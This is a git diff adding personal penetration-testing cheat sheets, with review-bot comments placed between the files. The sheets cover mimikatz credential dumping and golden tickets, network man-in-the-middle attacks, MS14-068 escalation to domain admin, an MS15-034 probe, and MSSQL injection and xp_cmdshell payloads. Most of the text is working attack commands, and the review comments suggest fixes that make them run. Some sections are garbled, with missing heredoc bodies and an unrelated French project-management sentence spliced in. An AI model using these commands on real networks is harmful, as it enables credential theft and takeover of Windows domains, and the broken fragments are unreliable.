+http://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
+http://adsecurity.org/?p=556 https://adsecurity.org/?page_id=1821
+https://github.com/gentilkiwi/mimikatz/wiki
+
+# always (to access secure lsa mem)
+privilege::debug
+
+# lulz
+coffee
+markruss
+minesweeper::infos
+
+# who am i
+system::user
+
+# minidump
+mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
+
+# list module commands
+sekurlsa::asdf
+
+# logged-on users
+sekurlsa::logonPasswords
+
+# outband SMB sessions
+sekurlsa::ssp
+
+# sam hashes
+samdump::hashes
+
+# get system
+token::elevate
+
+# lsa secrets and cached creds
+lsadump::secrets system.save security.save
+lsadump::cache system.save security.save
+
+# vault
+vault::list
+vault::cred
+
+# scheduled tasks with credz
+?
+
+# kiwissp.dll
+Security Providers
+will dump passwords in clear-text of users logging-on console or RDP
+
+# pass the ticket (aka overpass-the-hash)
+sekurlsa::pth /user:Administrator /domain:LAB.lOCAL /rc4:6194bd1a5bf3ecd542e8aac9860bddf0
+or with /aes256: instead of rc4 or etc.
+
+# pass the hash to RDP to host using restricted admin mode
+sekurlsa::pth /user: /domain:bar /ntlm:... /run:"mstsc /restrictedadmin /v:1.2.3.4"
+
+# kerberos tickets
+sekurlsa::ekeys # dump all keys in mem
+sekurlsa::tickets /export # export tickets of everyone if SYSTEM
+kerberos::klist
+kerberos::ptt blah.tgt blih.tgs # import tgt or tgs
+kerberos::ptt tickets # list
+
+# golden ticket (tgt 10years hardcoded)
+# http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
+# http://rycon.hu/papers/goldenticket.html
+- krbtgt user's NT hash (e.g. from a previous NTDS.DIT dump)
+- Domain name
+- Domain's SID (S-1-5-21-1723555596-1415287819-2705645101)
+- Username that we'd like to impersonate
+
+PsGetsid.exe CTU.DOMAIN (or with whoami)
+mimikatz.exe
+ kerberos::list
+ kerberos::purge # not 100% reliable but loggoff is
+ kerberos::golden /admin:Administrator /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi
+ kerberos::golden /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /rc4:6194bd1a5bf3ecd542e8aac9860bddf0 /user:Administrator /id:500 /groups:513,512,520,518,519 /ptt *or* /ticket:domain.local.kirbi and then kerberos:ptt domain.local.kirbi
+ kerberos::list
+ kerberos::tgt # list tgt only
+
+512: domain admins
+519: enterprise admins
+518: schema admins
+520:
+513:
+
+additional notes:
+- Password change on behalf of the user does not have any impact on the ticket, the access can be granted without the user's password or hash
+- Existing sessions cannot be overridden. Already attached shares have to be detached first and reattached again.
+- Cached tickets sometimes cannot be purged so the computer has to be restarted (for example if there is a group policy that attaches different shares then those shares cannot be mounted as the impersonated user)
+- Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT
+
+# silver ticket (TGS)
+https://adsecurity.org/?p=2011
+
+# mass mimikatz and null session share setup howto
+https://blog.netspi.com/auto-dumping-domain-credentials-using-spns-powershell-remoting-and-mimikatz/
+http://www.room362.com/blog/2013/10/06/dumping-a-domain-worth-of-passwords-with-mimikatz/
+
+# virtual machine memory (eg from a .vmem)
+http://carnal0wnage.attackresearch.com/2014/06/mimikatz-against-virtual-machine-memory.html
+
+# change user password with only the nt hash
+aoratopw.exe /user:jsmith /domain:chocolate.local /key:asjdfasdfasdf /new:Kikoolol1
+
+# beyond
+misc::addsid # sid history
+
+mimilib Password Filter
+mimilib SSP # requires reboot
+
+misc::memssp # to try out
+
+misc::skeleton
+
+# windows 8.1
+http://carnal0wnage.attackresearch.com/2015/02/msfs-mimikatz-doesnt-work-on-windows-81.html?utm_content=buffer1ac94&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer
+https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/
+http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
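Review bot: The RID table under the golden-ticket section leaves `520:` and `513:` without labels; the well-known values are `513: domain users` and `520: group policy creator owners`, which is why the `/groups:513,512,520,518,519` example carries them. The section lists what a forged TGT needs but not the defensive consequence already implied by the `tgt 10years hardcoded` remark and the note that a password change does not invalidate the ticket: the only remediation for a leaked krbtgt hash is resetting the krbtgt account password twice, with replication allowed between the two resets, because the KDC keeps the previous key valid. A line such as `# defence: rotate krbtgt twice after any NTDS.DIT exposure; alert on TGTs whose lifetime exceeds the domain Kerberos policy maximum` would round out the notes.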
diff --git a/Cheat Sheet/mitm b/Cheat Sheet/mitm
new file mode 100644
index 0000000..6e4d031
--- /dev/null
+++ b/Cheat Sheet/mitm
@@ -0,0 +1,210 @@
+# mitm
+
+# tools
+bettercap (https://github.com/evilsocket/bettercap-proxy-modules)
+pyersinia (https://github.com/nottinghamprisateam/pyersinia) based off yersinia
+mallory
+marvin (http://www.gremwell.com/marvin-mitm-tapping-dot1x-links)
+apimonitor (http://www.rohitab.com/apimonitor)
+echomirage (http://www.wildcroftsecurity.com/echo-mirage was:http://www.bindshell.net/tools/echomirage.html)
+pfi (https://github.com/s7ephen/pfi.git)
+tcpprox (https://github.com/iSECPartners/tcpprox) "TCP proxy utility written in Python"
+canape (http://www.contextis.com/research/tools/canape/) "capture and modify traffic, specifically designed for binary protocols"
+trudy https://www.praetorian.com/blog/trudy-a-dead-simple-tcp-intercepting-proxy-mitm-vm
+NetRipper (https://github.com/NytroRST/NetRipper ) "Windows API hooking"
+Trudy https://github.com/praetorian-inc/trudy
+
+# anti arp spoof
+http://arpon.sourceforge.net/
+
+# linking 2 laptops
+* setting up
+iwconfig wlan0 channel 3
+iwconfig wlan0 enc on
+iwconfig wlan0 key 1234-1234-12
+iwconfig wlan0 essid hsc
+ifconfig wlan0 2.3.2.1 netmask 255.0.0.0 up
+iptables -I INPUT 1 -i wlan0 -m mac --mac-source ! 00:11:22:33:44:55 -j DROP
+iptables -i INPUT -i wlan0 -p tcp --dport ssh -s 2.3.2.20 -j ACCEPT
+iptables -P INPUT DROP
+* accessing
+iwconfig: idem
+ifconfig wlan0 hw ether 00:11:22:33:44:55
+ifconfig wlan0 2.3.2.20 netmask 255.0.0.0 up
+
+# superfish / komodia
+https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken/
+
+#### webmitm avec ARP poisoning
+openssl genrsa -out example.key 1024
+openssl req -new -key example.key -out example.csr
+openssl x509 -req -days 365 -in example.csr -signkey example.key -out example.crt
+
+cat > /etc/hosts-to-spoof <<'EOF'
+192.168.0.31 www.example.com
+192.168.0.31 *.google.*
+EOF
+
+dnsspoof -f /etc/hosts-to-spoof dst port udp 53 # uniquement en ARP poisoning
+iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string '|01 00 00 01 00 00 00 00 00 00 03 77 77 77 06 67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00 01|' -j DROP # ne pas forwarder toute query A pour www.example.com
+
+echo 1 > /proc/sys/net/ipv4/ip_forward
+
+# broadcast ARP replies to all hosts, saying that the IP of the gw maps to my MAC address
+arpspoof IP_gw
+# ou mieux: unicast ARP replies to only victim and gateway
+arpspoof -t victim gw
+arpspoof -t gw victim
+
+# Va ecouter sur :80 et :443 et se base sur Host: ou URL complète pour rediriger (sauf si argument host).
+# Va servir le meme certificat SSL serveur.
+# Il faut des \r\n dans la requete (marchera pas avec des \n).
+webmitm -ddd
+
+#### mitm avec DNS poisoning
+# e.g. csrf pour mettre une resolution statique www.google.fr 192.168.0.31
+# ou
+# dhcp spoof avec mon ip comme nameserver:
+# dnsmasq - Permet de forwarder. Permet pas de faire *.google.*
+dnsmasq -k -q -8 /tmp/dnsmasq.log -A '/google.fr/google.com/192.168.0.31'
+
+#sniff avec Wireshark (trafic en clair uniquement)
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.0.32.10 # IP du site web usurpé
+iptables -t nat -I POSTROUTING -j MASQUERADE
+et lancer un wireshark
+
+#sniff avec Burp
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8082
+iptables -t nat -I PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8082 # generation auto de cert avec CN=w.x.y ne marche pas
+
+#sniff avec Squid
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 3128 # squid.conf: http_port 3128 accel vhost
+iptables -t nat -I PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 3129 # squid.conf: https_port 3129 vhost cert=wildcard.pem # mais avertissement de secu probable
+
+#sslstrip
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 1337
+$ sslstrip -f -a -l 1337 -w /tmp/sslstrip.log # pas en root
+
+#sniff de mdp
+dsnif -n
+ettercap -Tzq
+
+urlsnarf | cut -d\" -f2
+tshark -ln -i eth0 -R http -V| sedhttp
+
+#### mitm avec DHCP et DNS poisoning (half-duplex: on ne voit pas les reponses)
+#avec dnsmasq
+echo 1 > /proc/sys/net/ipv4/ip_forward
+dnsmasq -k -q -8 /tmp/dnsmasq.log --dhcp-range=192.168.0.10,192.168.0.50,255.255.255.0,24h --dhcp-option=option:dns-server,8.8.8.8 # je suis le routeur
+# et meme manip sslstrip pour le ssl
+arpspoof -t 192.168.0.254 192.168.0.20 # pour voir les reponses (ie. reponses HTTP, images ...)
+
+#avec ettercap
+ettercap -Tzq -M dhcp:/255.255.255.0/8.8.8.8
+
+# mitm iphone
+cat hostapd.conf
+interface=wlan0
+driver=nl80211
+ssid=hsc
+channel=11
+hw_mode=g
+macaddr_acl=0
+auth_algs=1
+ignore_broadcast_ssid=0
+wpa=2
+wpa_passphrase=blahblah
+wpa_key_mgmt=WPA-PSK
+wpa_pairwise=CCMP
+rsn_pairwise=TKIP
+
+hostapd ./hostapd.conf
+
+ip addr add 192.168.8.1/24 dev wlan0
+echo 1 > /proc/sys/net/ipv4/ip_forward
+route add default gw ... #optional
+
+$IP4 -A FORWARD -i wlan0 -j ACCEPT
+$IP4 -A FORWARD -o wlan0 -d 192.168.8.0/24 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
+
+iptables -t nat -I PREROUTING -p tcp -s 192.168.8.46 --dport 80 -j REDIRECT --to-ports 8082
+iptables -t nat -I PREROUTING -p tcp -s 192.168.8.46 --dport 443 -j REDIRECT --to-ports 8082
+iptables -t nat -A POSTROUTING -s 192.168.8.0/24 -j MASQUERADE
+
+dnsmasq --bind-interfaces --listen-address 192.168.8.1 -k -q -8 /tmp/dnsmasq.log --dhcp-range 192.168.8.10,192.168.8.50,255.255.255.0,24h --dhcp-option option:dns-server,192.168.8.1 --dhcp-option option:router,192.168.8.1 -p 54 -R -C /dev/null
+or just dns:
+dnsmasq --bind-interfaces --listen-address 192.168.8.1 -k -q -8 /tmp/dnsmasq.log -p 53 -C /dev/null
+
+# wifi mitm to try out
+http://www.reddit.com/r/netsec/comments/1hcnz7/python_mitm_tool_targeting_script_for_local/
+https://github.com/hatRiot/zarp
+
+# redir *
+iptables -A OUTPUT -p ICMP -j DROP
+iptables -t nat -A PREROUTING -p udp --dst 192.168.10.21 --dport 53 -j DNAT --to-destination 192.168.12.38:53
+iptables -t nat -A PREROUTING -p udp --dst 192.168.10.21 --dport 88 -j DNAT --to-destination 192.168.12.38:88
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 445 -j DNAT --to-destination 192.168.12.38:445
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 389 -j DNAT --to-destination 192.168.12.38:389
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 139 -j DNAT --to-destination 192.168.12.38:139
+
+# proxenet inject html + capture smb
+MYIP=192.168.122.99
+VICTIMIP=192.168.122.141
+GWIP=192.168.122.1
+
+cat > ~/.proxenet.ini < ~/injected_page.html
+
+modify payload in inject_this() with $MYIP
+
+sed -e 's,^Port 8080,Port 3129,' /etc/tinyproxy.conf
+service tinyproxy restart
+
+./proxenet -b $MYIP -p 8008 -N -X 127.0.0.1 -P 3129
+
+iptables -t nat -I PREROUTING -i eth0 -p tcp ! -s $MYIP --dport 80 -j REDIRECT --to-port 8008
+iptables -t nat -I PREROUTING -i eth0 -p tcp ! -s $MYIP --dport 445 -j REDIRECT --to-port 445
+iptables -t nat -A POSTROUTING -s 192.168.122.0/24 -j MASQUERADE
+
+cat > msf-capture.rc < donc MOA > MOE (est au dessus de)
+
+Le maitre d'ouvrage est l'adjoint ingénierie système du projet XXX. Son role concerne essentiellement le besoin, le choix et l'arbitrage des options, la définition des budgets et des délais de réalisation.
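Review bot: In the `# linking 2 laptops` firewall rules, the second line `iptables -i INPUT -i wlan0 -p tcp --dport ssh -s 2.3.2.20 -j ACCEPT` uses lowercase `-i` where the chain is meant; `-i` is the interface match, so this line fails and the `-P INPUT DROP` that follows locks out the ssh peer too — it should read `iptables -I INPUT 2 -i wlan0 -p tcp --dport ssh -s 2.3.2.20 -j ACCEPT` (or `-A INPUT ...`). In the `hostapd.conf` sample, `wpa=2` is paired with `rsn_pairwise=TKIP`; for WPA2 it is `rsn_pairwise` that selects the cipher, so this AP offers the deprecated TKIP cipher and `rsn_pairwise=CCMP` is what matches the intent of the `wpa_pairwise=CCMP` line above it. Finally, `cat > ~/.proxenet.ini < ~/injected_page.html` and `cat > msf-capture.rc < donc MOA > MOE` look like heredocs whose bodies were lost when the file was rendered (the hunk header announces 210 lines but far fewer survive, and the closing paragraph is unrelated French project-management text), so those two sections should not be copied as-is.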
diff --git a/Cheat Sheet/mod_jk b/Cheat Sheet/mod_jk
new file mode 100644
index 0000000..4f47d0b
--- /dev/null
+++ b/Cheat Sheet/mod_jk
@@ -0,0 +1,48 @@
+# tomcat-connector mod_jk
+
+# compiler mod_jk
+$ unzip tomcat-connectors-1.2.21-src.zip
+$ cd tomcat-connectors-1.2.21-src/native
+$ ./configure --with-apxs=/opt/m/httpd/httpd-2.0.52/bin/apxs
+
+$ vi httpd-2.0.52/conf/httpd.conf
+[...]
+LoadModule jk_module modules/mod_jk.so
+[...]
+JkWorkersFile /opt/m/tomcat/workers.properties
+JkShmFile /opt/m/tomcat/mod_jk.shm
+JkLogFile /opt/m/tomcat/mod_jk.log
+JkLogLevel info
+#JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "
+JkMount /WebApplication2/ServletTest worker1
+
+$ cat > workes.properties
+# Define 1 real worker using ajp13
+worker.list=worker1
+# Set properties for worker1 (ajp13)
+worker.worker1.type=ajp13
+worker.worker1.host=localhost
+worker.worker1.port=8009
+
+# tomcat directory traversal
+https://www.sec-consult.com/files/20070314-0-apache_tomcat_directory_traversal.txt
+
+SEC Consult Security Advisory < 20070314-0 >
+=======================================================================
+ title: Apache HTTP Server / Tomcat directory traversal
+ program: Apache HTTP Server / Apache Tomcat
+ vulnerable version: Apache Tomcat 5.x: < 5.5.22
+ Apache Tomcat 6.x: < 6.0.10
+ CVE: CVE-2007-0450
+
+Vulnerability description:
+---------------
+
+ * The only character found to be accepted as directory separator
+ from Apache is "/" (slash).
+ * On the other hand Tomcat allows characters including URI encoded
+ characters like "/" (slash), "\" (backslash) or "%5C" (backslash
+ URI encoded).
+
+http://www.example.com/WebApplication2/%252E%252E/manager/html
+http://www.example.com/WebApplication2/\../manager/html (marche pas si windows)
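Review bot: The heredoc target `cat > workes.properties` does not match `JkWorkersFile /opt/m/tomcat/workers.properties` a few lines above, so mod_jk would start without any worker definition when these steps are followed verbatim; it should read `cat > /opt/m/tomcat/workers.properties`. The traversal check at the end would be clearer with the mechanism recorded next to it: Apache only normalises a literal `/`, so the still-encoded `%252E%252E` path is handed over AJP to Tomcat, which decodes it again (this is what the CVE-2007-0450 excerpt above describes), and the probe is only meaningful for a context exposed through `JkMount` on a host where the manager webapp is deployed.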
diff --git a/Cheat Sheet/modbus b/Cheat Sheet/modbus
new file mode 100644
index 0000000..a56b8e3
--- /dev/null
+++ b/Cheat Sheet/modbus
@@ -0,0 +1,3 @@
+# modbus
+
+https://github.com/enddo/smod
diff --git a/Cheat Sheet/modem b/Cheat Sheet/modem
new file mode 100644
index 0000000..7e1d562
--- /dev/null
+++ b/Cheat Sheet/modem
@@ -0,0 +1,6 @@
+# modem
+
+br2684ctl -b -c 1 -a 0.xx
+ifconfig eth0 down
+ifconfig nas1 up
+dhcpcd -T --vendorclassid=NEUFTVSTB_MA nas1
diff --git a/Cheat Sheet/mp3splt b/Cheat Sheet/mp3splt
new file mode 100644
index 0000000..c63f4be
--- /dev/null
+++ b/Cheat Sheet/mp3splt
@@ -0,0 +1,4 @@
+# mp3splt
+
+# extraire un morceau d'une interview audio
+mp3splt in.mp3 22.36 25.25 -o out.mp3
diff --git a/Cheat Sheet/ms14-068 b/Cheat Sheet/ms14-068
new file mode 100644
index 0000000..338a1c1
--- /dev/null
+++ b/Cheat Sheet/ms14-068
@@ -0,0 +1,80 @@
+# ms14-068
+
+apt-get install krb5-user rdate -y
+rdate -n 10.10.10.10 # sync with DC's time
+
+* I had to comment out below line in /etc/krb5.conf to not use a keyring but the default ccache file:
+# default_ccache_name = KEYRING:persistent:%{uid} default_ccache_name = FILE:/tmp/krb5cc_%{uid}
+
+* the domain FQDN has to be in uppercase otherwise you’ll get this error: “kinit: KDC reply did not match expectations while getting initial credentials”
+$ kinit kevin@DOMAIN.INT
+
+* you should now have a /tmp/krb5cc_1000 file
+
+* get the user’s SID
+$ rpcclient -U ‘kevin%P@ssword1’ somedc.domain.int
+rpcclient $> lookupnames kevin
+kevin S-1-5-21-1234567890-12345678-9876543-77601 (User: 1) rpcclient $> exit
+
+* use pykek to create a DA ticket
+$ python ms14-068.py -u kevin@DOMAIN.INT -s S-1-5-21-1234567890-12345678-9876543-77601 -d thepdc.domain.int
+
+* replace the ticket
+$ mv TGT_kevin@DOMAIN.INT.ccache /tmp/krb5cc_1000
+
+* pass -k and FQDN on command line (and not the IP, otherwise it will be ntlm)
+might need to first: export KRB5CCNAME=/root/Admin@domain.int.ccache && chmod 700 $KRB5CCNAME
+klist
+smbclient --kerberos -W DOMAIN.INT //dcw2k12.domain.int/c$ # might not work on vulnerable w2k12r2
+
+kvno ldap/dcw2k12.domain.int@DOMAIN.INT # obtain service ticket
+klist
+
+* On my Windows7 VM I ran cmd.exe as Administrator and generated the hash of kevin’s password
+C:\>wce.exe -g P@ssword1
+
+* changed my current logon session
+C:\>wce.exe -s kevin:DOMAIN:11CB3F697332AE4C38F10713B629B565:EAD0CC57DDAAE50D876B7DD6386FA9C7
+
+* used mimikatz to inject DA ticket
+C:\>mimikatz.exe
+mimikatz # kerberos::ptc c:\TGT_kevin@DOMAIN.INT.ccache
+mimikatz # exit
+
+* confirmed I now was a DA
+C:\>dir \\thepdf.domain.int\c$
+
+* Now to get command exec, I simply killed explorer and spawned another explorer from the cmd.exe and ran psexec:
+C:\>explorer
+C:\>PsExec.exe \\thepdc.domain.int cmd.exe
+
+# winexe -k
+jamais teste mais ca a pas l'air de marcher avec winexe -k yes
+il faudra essayer avec winexe-waf
+
+# avec le patch de _r1
+copie du TGT_@ dans /tmp/krb5cc_
+modifier son resolv.conf pour ajouter "nameserver "
+
+rpcclient -k -I
+rpcclient $> createdomuser toto
+rpcclient $> setuserinfo2 toto 21
+rpcclient $> addgroupmember 512 toto
+(512 : groupe admin de dom)
+=> toto est admin de dom
+
+# avec net -k
+http://www.josho.org/blog/blog/2014/12/21/ldap-create-user/
+
+# avec winexe -k
+winexe: Installed: 1.1~20130620-0kali5
+krb5-user: Installed: 1.10.1+dfsg-5+deb7u3
+
+# blogs
+https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
+http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
+http://hashcrack.org/page?n=10122014
+https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/
+https://www.shellandco.net/ms14-068-check-domain-controllers-date/ # remote check in powershell using wmi
+http://www.verisgroup.com/2015/04/08/ms14-068-background/ # convert krb tickets
+
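Review bot: `dir \\thepdf.domain.int\c$` in the "confirmed I now was a DA" step names a host that appears nowhere else — the DC is `thepdc.domain.int` in the pykek and PsExec lines — so the check as written resolves the wrong name; it should be `dir \\thepdc.domain.int\c$`. The `rpcclient -U ‘kevin%P@ssword1’` line and the quoted kinit error carry typographic quotes pasted from a blog, which the shell passes literally; replace them with `'kevin%P@ssword1'`. Next to `chmod 700 $KRB5CCNAME` it is worth noting that a ccache is a plain file and `chmod 600` is the tighter setting, and that `mv TGT_kevin@DOMAIN.INT.ccache /tmp/krb5cc_1000` silently overwrites the legitimate TGT obtained by kinit, so copy it aside first if you need it again.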
diff --git a/Cheat Sheet/ms15-034 b/Cheat Sheet/ms15-034
new file mode 100644
index 0000000..9976680
--- /dev/null
+++ b/Cheat Sheet/ms15-034
@@ -0,0 +1,10 @@
+# ms15-034
+
+http://www.securitysift.com/an-analysis-of-ms15-034/
+
+might need to issue a pre request first
+http://pastebin.com/ypURDPc4
+see msf module too
+Range" => "bytes=0-18446744073709551615 # carrier
+
+http_fuzz url=http://FILE0/ header='Range: bytes=0-18446744073709551615' 0=http-sys.hosts
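Review bot: The note keeps the carrier header but not how to read the answer, so the `http_fuzz` line on its own gives no verdict per host; in the linked analysis a vulnerable HTTP.sys replies to `Range: bytes=0-18446744073709551615` with 416 while a patched one returns 400, so the expected codes belong next to the header and the scan should filter on them, e.g. `http_fuzz url=http://FILE0/ header='Range: bytes=0-18446744073709551615' 0=http-sys.hosts -x ignore:code=400`. Ranges with a non-zero lower bound are the ones reported to crash the kernel, so the sheet should state explicitly that the 0-based range is the non-destructive probe — treat that as something to confirm against the write-up before running it against production hosts.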
diff --git a/Cheat Sheet/msaccess b/Cheat Sheet/msaccess
new file mode 100644
index 0000000..d6fcb52
--- /dev/null
+++ b/Cheat Sheet/msaccess
@@ -0,0 +1,4 @@
+# ms access
+
+# sqli ms access
+http://www.krazl.com/blog/?p=3
diff --git a/Cheat Sheet/mssql b/Cheat Sheet/mssql
new file mode 100644
index 0000000..e357f44
--- /dev/null
+++ b/Cheat Sheet/mssql
@@ -0,0 +1,235 @@
+# mssql
+
+# linux clients
+sqlquery (SQL Auditing Tools, (SQLat) http://www.vulnerabilityassessment.co.uk/sqlat.htm)
+TDSVER=7.0 tsql -S 192.168.122.23:1433 -U DOM\admin.global -P Password1 # or TDSVER=8.0
+impacket (http://pen-testing.sans.org/blog/pen-testing/2013/05/21/tds-mssql-and-python-oh-my)
+dbvis (GUI)
+sqsh (never tested, old++, and requires to configure /etc/freetds/freetds.conf)
+
+apt-get install freetds-dev
+export FREETDSCONF=${HOME}/.freetds.conf
+cat << EOF >> ~/.freetds.conf
+[target]
+ # The target IP address
+ host = x.x.x.x
+ # The target port
+ port = 1433
+ # tds version
+ tds version = 8.0
+EOF
+echo '\set semicolon_hack=on' >> ~/.sqshrc
+
+sqsh -w 256 -U sa -P '' -S 127.0.0.1 # sa/
+sqsh -w 256 -U sa -P '' -S target # uses .freetds.conf
+
+# windows clients (in Program Files)
+isql.exe –S PRDSRV1 –U sa –P Password1 –Q “SELECT name FROM master..sysdatabases”
+osql (same cmdline) (have a standalone in hsccvs)
+sqlcmd (same cmdline) supports 2008R2 features
+
+# osql usage
+osql -D BLAH -E #ODBC
+osql -Stcp:myServer,portNumber -E
+
+# getsysadmin (since mssql 2008 (2008 R2, 2012 ...) local admins are no longer members of the sysadmin role (http://msdn.microsoft.com/en-us/library/dd207004.aspx))
+* if < MS SQL 2012 then start SQL Server Management Studio as SYSTEM
+psexec -i -s SSMS.exe, or sqlwb.exe, or osql.exe -E
+
+* if >= MSSQL 2012, solution is to force sql server to put sql server in single mode (ie. this will DoS other clients) so that local admin can login and create a new sysadmin or add himself to sysadmins (http://mobydisk.com/softdev/techinfo/sqlserver.html)
+- force mixed-mode auth (not needed if you will create a new builtin sysadmin, required if you want to add local admin to sysadmins)
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQLServer set "LoginMode" to 2
+Restart SQL Server
+- single mode & new sysadmin
+services.msc -> stop SQL Server. Make sure SQL Server Agent service is stopped
+otherwise he will take the only connection.
+Grab the SQL server command-line (right click the service - properties) (“c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER2008\MSSQL\Binn\sqlservr.exe” -sMSSQLSERVER2008)
+Open an administrative command prompt
+Run the command-line from step 3, but add -m -c for single-user maintenance mode command-line. ("c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER2008\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER2008 -m -c)
+Open another administrative command prompt.
+Run "sqlcmd -S localhost\SQLEXPRESS" from that same directory (replace with your server and instance name)
+Now you can do all the stuff everyone told you to do that didn"t work. For example, to create a hero user with administrative access:
+CREATE LOGIN hero WITH PASSWORD="123", DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
+EXEC sys.sp_addsrvrolemember @loginname = "hero", @rolename = "sysadmin"
+GO
+QUIT and close the command-prompt
+Go to the SQL Server command-line window and hit ctrl+C. It will prompt "Do you wish to shutdown SQL Server (Y/N)?" and enter Y.
+Close the command-prompt
+Restart SQL Server service and login away!
+
+# Mon install de MSSQLServer 2005 sur ma VM locale windows 2003 EN.
+Pendant l'install, j'ai selectionné :
+ - "Default instance"
+ - "Use the built-in System account" "Local system"
+ - "Windows Authentication Mode"
+Le reste des questions, j'ai laissé par defaut.
+
+# hashcat mssql
+0x0100 [a-Z0-9]{8} [a-Z0-9]{40} [a-Z0-9]{40}
+ salt sha1($pass.$salt) sha1($pass.upper().$salt)
+oclhashcat-plus -m 2500
+oclhashcat-lite -m 1300
+
+# audit / pentest
+* boolean blind
+and unicode(substring((select isnull(@@version,char(32))),1,1))=77 # 'M' de Microsoft
+
+group by news.news_id having 1=1--
+
+* error based sqli
+and 1=convert(int,@@version) and 'a'='a
+and 1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'
+
+* time
+foo=bar' waitfor delay '0:0:5'--
+
+* stacked time
+;waitfor delay '0:0:5'--
+;if(1=1) waitfor delay '0:0:5'--
+;if(unicode(substring((select version()),1,1)>51) waitfor delay '0:0:5'--
+
+* basics
+sqlcmd -L
+sqlcmd -S -U sa -P *
+1> USE [Database With Spaces]
+2> select Email, PasswordFormat, PasswordSalt, Password from aspnet_Membership
+3> go
+
+select @@version
+select @@servername
+select db_name()
+select user_name()
+exec master..xp_msver
+exec master..xp_loginconfig
+select name, value_in_use from sys.configurations #name collate SQL_Latin1_General_CP1_CI_AS, cast(value_in_use as int)
+select SERVERPROPERTY('MachineName') # server name
+select CONNECTIONPROPERTY('local_net_address'), CONNECTIONPROPERTY('client_net_address') # > mssql 2005, local IP and remote IP
+
+* list users
+SELECT name FROM master..syslogins
+
+* list passwords
+ < mssql 2005
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
+ >= mssql 2005
+SELECT name, password_hash FROM master.sys.sql_logins
+SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+
+* list sysadmins
+SELECT name FROM master..syslogins WHERE sysadmin = '1' # >= mssql 2005
+
+* list dbs
+EXEC sp_databases
+select name, filename from master..sysdatabases
+SELECT DB_NAME(N); — for N = 0, 1, 2, …
+
+SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog=''
+
+* list tables
+select name from nom_de_la_base..sysobjects where type='U'
+select table_name from nom_de_la_base.information_schema.tables
+
+* list columns
+select column_name from [database name].information_schema.columns where table_name = N'the_table'
+
+* list tables & columns
+SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM ladb..sysobjects JOIN ladb..syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' # AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
+
+* get table desc
+exec sp_columns nom_table
+
+* dump table
+select top 10 * from [nom_db].[nom_schema].[nom_table] // eg. webapp.dbo.users
+
+* liste les fonctions udf
+SELECT name AS function_name, SCHEMA_NAME(schema_id) AS schema_name, type_desc FROM ladb..objects WHERE type_desc LIKE '%FUNCTION%';
+SELECT name AS function_name, SCHEMA_NAME(schema_id) AS schema_name, type_desc FROM sys.objects WHERE type_desc LIKE '%FUNCTION%';
+or
+select name, definition, type_desc FROM sys.sql_modules m INNER JOIN sys.objects o ON m.object_id=o.object_id where type_desc like '%function%'
+
+# xp_dirtree
+master.dbo.xp_dirtree to force the db server to authenticate to an SMB server
+EXEC master.sys.xp_dirtree 'D:\Backup\TRON4\TEST2\MyDb1',0,1;
+
+# xp_cmdshell
+id=1; exec xp_cmdshell 'net user own3d Password1 /add'
+
+select * from SYS.CONFIGURATIONS WHERE Name='xp_cmdshell'
+
+si xp_cmdshell a été desactivé, commandes pour le reactiver (SQL Server 2005 ou 2008):
+exec sp_configure 'show advanced options',1;reconfigure; OU reconfigure with override # si ca n'a pas marche
+exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure; # dunno what that does (c/p from blog)
+exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure; OU reconfigure with override
+
+On MSSQL 2000:
+ If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc,
+ we can simply inject the following code:
+
+ EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
+
+ This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
